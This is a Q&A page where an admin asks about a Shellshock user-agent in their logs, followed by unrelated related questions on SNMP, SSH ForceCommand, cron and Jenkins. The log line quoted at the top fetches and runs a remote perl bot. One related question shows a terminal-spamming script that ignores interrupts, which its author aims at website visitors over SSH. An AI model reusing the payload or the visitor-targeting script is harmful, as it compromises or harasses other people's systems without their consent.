Getting very strange user agent in logs - user-agent

My logs shows a very strange user agent which is shown below:
() { :;}; /bin/bash -c "cd /var/tmp;wget http://151.236.44.210/efixx;curl -O http://151.236.44.210/efixx;perl efixx;perl /var/tmp/efixx;perl efixx"
Can anyone tell what is it trying to do... I think it is hacking attempt and how can restrict access to it.

That does indeed look like an attempt to exploit the Shellshock bash bug. https://security.stackexchange.com/questions/68122/what-is-a-specific-example-of-how-the-shellshock-bash-bug-could-be-exploited
The sender of that request is trying to get your machine to download a purl script called efixx from http://151.236.44.210/ and then execute it. That purl script is the "LinuxNet perlbot".
You should check to make sure you don't have the file called "efixx" on your computer and if you do make sure it isn't running. Also make sure you are running the latest version of bash and you should be ok.

Related

SNMP pass command returning OID error but apparently running on server

I'm just moving my first steps with SNMP, I'm trying to add the output of a simple check script to SNMP but I'm facing some issues.
I'm trying to add a temperature check file for a Raspberry Pi 4 to be returned via SNMP to a remote poller, but just following most of the guides online lead to me to nothing, since I'm stuck with this error every time:
No Such Instance currently exists at this OID
I'm trying using the pass function but I had no luck getting any result.
Currently this is what I declared in the snmpd.conf file:
pass 1.3.6.1.2.1.25.1.8 /bin/bash /script/check_temp.sh
This is the command output:
/script/check_temp.sh
.1.3.6.1.2.1.25.1.8
integer
589
This is the command output from the poller:
snmpget -c test -v 2c 1.2.3.4 .1.3.6.1.2.1.25.1.8
HOST-RESOURCES-MIB::hrSystem.8 = No Such Instance currently exists at this OID
But if I try to run snmpd in foreground I don't actually see any error, seems instead that the script is executed:
sudo snmpd -f -Le -Ducd-snmp/pass -Drun
registered debug token ucd-snmp/pass, 1
registered debug token run, 1
NET-SNMP version 5.7.3
ucd-snmp/pass: pass-running: /bin/bash /usr/script/check_temperature/check_temp.sh -g .1.3.6.1.2.1.25.1.8
run:exec: running '/bin/bash /usr/script/check_temperature/check_temp.sh -g .1.3.6.1.2.1.25.1.8'
run:exec: got 120000 bytes
run:exec: child 7480 finished. result=768
What am I doing wrong? None of the guides I checked mentioned creating MIBS, or any other further steps than I'm already doing, but I'm still getting nothing of what I'm expecting.
Thanks in advance for any hint or suggestion that'll get me on the right way.
I hope this could help anybody trying to configure SNMP checks for their Raspberry, or any other tipycal Linux device, since most of the guides I checked were assuming you would already know some SNMP concepts, while it's possible that while you are just starting you are still not mastering them.
Most of the guides will either state to use extend or passas following:
view all included .1.3.6.1.4.1
pass .1.3.6.1.4.1.9999.1 /bin/bash /path/to/command
extend checkcommand /bin/bash /path/to/command
Like this, I faced the issues of my original question; I was able to get things working only when I added the following lines, providing an empty OID branch to the extend function and the view all accessibility to the .1.3.6.1.4.1 branch:
view all included .1.3.6.1.4.1
extend .1.3.6.1.4.1.9999.1 checkcommand /bin/bash /path/to/command
This way I actually get a reply from snmpwalk, and from snmpwalk result on OID .1.3.6.1.4.1.9999.1 you can retrieve the OID snmpd builds for the output of the script, in order to use it to make snmp queries from a poller.
I know this probably is the basis, but all the tutorials and guides I read at first were likely implying one or more of these steps, so I hope this can be of help to any other SNMP beginner.

Run local bash script on remote host

I have this bash script that opens a terminal repeatedly with no way of closing them and keeps one after another. The goal is annoy anyone who happens to execute this program. Here's the source code of it:
#!/bin/bash
while true
do
gnome-terminal -x sh -c "./<name-of-script.sh>; bash"
clear
sleep 1
trap '' 2
exit
done
I have tested this and it does work the way I want it to. What I'm trying to do is execute this script on a remote host. On a ruby on rails website I have set an image to attempt to run this script by clicking on it. When someone does they will run a controller function called call_script2 and here's what I have so far:
def call_script2
remote_ip = request.ip
#system("scp /home/ncs/<script.sh> root##{remote_ip}:/root/")
system("ssh root##{remote_ip} sudo home/ncs/./<script.sh>")
render 'script/index'
end
What I'm trying to accomplish is to run the contents of the bash script on the remote host when they click on a certain image. As you can see I've tried uploading the script of the host under the root directory and then trying to run the bash program with no success. I'm perfectly fine using something other than SSH if this not do able.
Please feel free to share your thoughts on this and thank you for taking the time to read my post. Have a great day!
Update: I was able to accomplish this goal by using the following:
system("ssh -t root##{remote_ip} DISPLAY=:0 ./Thorgrim.sh")
Thank you to everyone who have commented on this post to help me out!

Invoking a process whenever someone logins through SSH

I'm trying to invoke a ruby script whenever anyone tries to SSH into the server(say Ubuntu 14.04).
Like for example someone is trying to login with ssh root#serverip and my ruby script should be called upon and the login process should continue only if the script returns true and if returns false the connection should be closed.
How can I achieve this?
Thanks.
To fulfill your requirements, you should also work with $SSH_ORIGINAL_COMMAND environment variable, if you use ForceCommand option:
ForceCommand /path/to/script && $SSH_ORIGINAL_COMMAND
This will run your script and based on the exit status of the /path/to/script, it will run the user command or exit session.
You can try using the ForceCommand parameter in the sshd_config file of your server. it's fairly straightforward and well documented online :)
You enter at the bottom of the config file:
ForceCommand /path/to/script
Not so sure if you can check for certain conditions and terminate the connection, however this might guide you.
As mentioned by a friend in an answer, exit code based execution didn't work for me.
Here's a workaround :-
As mentioned by some folks, I used this in /etc/ssh/sshd_config
ForceCommand /path/to/script
Then in the script I opened the bash if they satisfied certain conditions. For example in bash
#!/bin/bash
if [ condition ]
then
bash #This will open bash if condition is satisfied.
//login
fi
Thanks everyone!

Can Cron Jobs Use Gnome-Open?

I am running Ubuntu 11.10 (Unity interface) and I created a Bash script that uses 'gnome-open' to open a series of web pages I use every morning. When I manually execute the script in the Terminal, the bash script works just fine. Here's a sample of the script (it's all the same so I've shortened it):
#!/bin/bash
gnome-open 'https://docs.google.com';
gnome-open 'https://mail.google.com';
Since it seemed to be working well, I added a job to my crontab (mine, not root's) to execute every weekday at a specific time.
Here's the crontab entry:
30 10 * * 1,2,3,4,5 ~/bin/webcheck.sh
The problem is this error gets returned for every single 'gnome-open' command in the bash script:
GConf-WARNING **: Client failed to connect to the D-BUS daemon:
Unable to autolaunch a dbus-daemon without a $DISPLAY for X11
GConf Error: No D-BUS daemon running
Error: no display specified
I did some searching to try and figure this out. The first thing I tried was relaunching the daemon using SIGHUP:
killall -s SIGHUP gconfd-2
That didn't work so I tried launching the dbus-daemon using this code from the manpage for dbus-launch:
## test for an existing bus daemon, just to be safe
if test -z "$DBUS_SESSION_BUS_ADDRESS" ; then
## if not found, launch a new one
eval `dbus-launch --sh-syntax --exit-with-session`
echo "D-Bus per-session daemon address is: $DBUS_SESSION_BUS_ADDRESS"
fi
But that didn't do anything.
I tried adding simply 'dbus-launch' at the top of my bash script and that didn't work either.
I also tried editing the crontab to include the path to Bash, because I saw that suggestion on another thread but that didn't work.
Any ideas on how I can get this up and running?
Here is how the problem was solved. It turns out the issue was primarily caused by Bash not having access to an X window session (or at least that's how I understood it). So my problem was solved by editing my crontab like so:
30 10 * * 1,2,3,4,5 export DISPLAY=:0 && ~/bin/webcheck.sh
The "export DISPLAY=:0" statement told cron which display to use. I found the answer on this archived Ubuntu forum after searching for "no display specified" or something like that:
http://ubuntuforums.org/archive/index.php/t-105250.html
So now, whenever I'm logged in, exactly at 10:30 my system will automatically launch a series of webpages that I need to look at every day. Saves me having to go through the arduous process of typing in my three-letter alias every time :)
Glad you asked!
It depends on when it is run.
If the Gnome GDM Greeter is live, you can use the DBUS session from the logon dialog, if you will. You can, e.g., use this to send notifications to the logon screen, if no-one is logged in:
function do_notification
{
for pid in $(pgrep gnome-session); do
unset COOKIE
COOKIE="$(grep -z DBUS_SESSION_BUS_ADDRESS /proc/$pid/environ|cut -d= -f2-)"
GNUSER="$(ps --no-heading -o uname $pid)"
echo "Notifying user $GNUSER (gnome-session $pid) with '$#'"
sudo -u "$GNUSER" DBUS_SESSION_BUS_ADDRESS="$COOKIE" /usr/bin/notify-send -c "From CRON:" "$#"
done
unset COOKIE
}
As you can see the above code simply runs the same command (notify-send) on all available gnome-sessions, when called like:
do_notification "I wanted to let you guys know"
You can probably pick this apart and put it to use for your own purposes.

Getting a shell error code from curl in Jenkins while still displaying output in console

I am using a shell script in Jenkins that, at a certain point, uploads a file to a server using curl. I would like to see whatever output curl produces but also check whether it is the output I expect. If it isn't, then I want to set the shell error code to > 0 so that Jenkins knows the script failed.
I first tried using curl -f, but this causes the pipe to be cut as soon as the upload fails and the error output never gets to the client. Then I tried something like this:
curl ...params... | tee /dev/tty | \
xargs -I{} test "Expected output string" = '{}'
This works from a normal SSH shell but in the Jenkins console output I see:
tee: /dev/tty: No such device or address
I'm not sure why this is since I thought Jenkins was communicating with the slave using a normal SSH shell. In any case, the whole xargs + test thing strikes me as a bit of a hack.
Is there a way to accomplish this in Jenkins so that I can see the output and also test whether it matches a specific string?
When Jenkins communicates with slave via SSH, there is no terminal allocated, and so there is no /dev/tty device for that process.
Maybe you can send it to /dev/stderr instead? It will be a terminal in an interactive session and some log file in non-interactive session.
Have you thought about using the Publish over SSH Plugin instead of using curl? Might save you some headache.
If you just copy the file from master to slave there is also a plugin for that, copy to slave Plugin.
Cannot write any comments yet, so I had to post it as an answer.

Resources